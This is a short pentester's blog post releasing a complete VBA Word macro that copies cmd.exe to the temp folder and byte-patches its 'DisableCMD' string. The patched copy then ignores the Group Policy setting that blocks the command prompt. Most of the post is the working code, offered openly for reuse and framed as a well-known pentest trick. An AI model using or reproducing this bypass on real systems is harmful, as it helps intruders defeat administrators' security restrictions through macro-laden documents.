DisableCMD - History Repeating

Before I start. This is nothing new! Actually its known since many years (e.g. http://blog.didierstevens.com/2007/11/28/quickpost-disableamd-disableregistryfools/)

During a pentest i needed to patch cmd.exe to ignore the disablecmd policy setting. Nothing new, nothing special, but i needed to do it from remote and i had to use VBA/Word macros. Long story short, i decided to release the code, because its nothing special and the technique is well known.

Here is a short video about it:

VBA Macro to remove DisableCMD CMD.EXE restriction from Max Moser on Vimeo.

Short video showing my VBA byte patcher written to overcome DisableCMD policy setting. Sorry but i at least expected a fail safe behavior.

I am not any good in coding vba but it might save someone some time. I will add an example.doc on remote-exploit.org as well.

Sub patchcmd()
Dim Sourcefile As String, TargetFile As String, Windir As String, Tempdir As String
Dim F1 As Integer, F2 As Integer
Dim bytepattern(19) As Byte
Dim WshShell As Object

Set WshShell = CreateObject("WScript.Shell")
Windir = WshShell.ExpandEnvironmentStrings("%WinDir%")
Tempdir = WshShell.ExpandEnvironmentStrings("%temp%")

bytepattern(0) = &H44 'D
bytepattern(1) = &H0
bytepattern(2) = &H69 'i
bytepattern(3) = &H0
bytepattern(4) = &H73 's
bytepattern(5) = &H0
bytepattern(6) = &H61 'a
bytepattern(7) = &H0
bytepattern(8) = &H62 'b
bytepattern(9) = &H0
bytepattern(10) = &H6C 'l
bytepattern(11) = &H0
bytepattern(12) = &H65 'e
bytepattern(13) = &H0
bytepattern(14) = &H43 'C
bytepattern(15) = &H0
bytepattern(16) = &H4D 'M
bytepattern(17) = &H0
bytepattern(18) = &H44 'D

Dim fileoffset As Long
fileoffset = 0
Dim patternoffset As Long
patternoffset = 0
Dim gotbad As Boolean

gotbad = False

Sourcefile = Windir & "\system32\cmd.exe"
Destfile = Tempdir & "\dmc.exe"
  
Dim tmpbyte As Byte

    If Dir(Sourcefile) = "" Then Exit Sub
    FileCopy Sourcefile, Destfile
    F1 = FreeFile
    Open Sourcefile For Binary As F1
    
    F2 = FreeFile
    Open Destfile For Binary As F2
    
    While Not EOF(F1)
        gotbad = False
        
        Get #F1, , tmpbyte
        If tmpbyte = bytepattern(patternoffset) Then
            fileoffset = (Seek(F1) - 1)
            
            While (gotbad = False)
                Get #F1, , tmpbyte
                    patternoffset = patternoffset + 1
                    If tmpbyte = bytepattern(patternoffset) Then
                        If patternoffset > 18 Then
                            'Debug.Print "Found DisableCMD and position: " & fileoffset & "Patching it now"
                            Put #F2, fileoffset + 6, &H34
                            Close F1
                            Close F2
                            MsgBox "Yeah, run it from: " & Destfile, vbOKOnly, "CMD.EXE patched"
                            End
                        End If
                    Else
                        patternoffset = 0
                        gotbad = True
                    End If
            Wend
        End If
    Wend
    Close F1
    Close F2
End Sub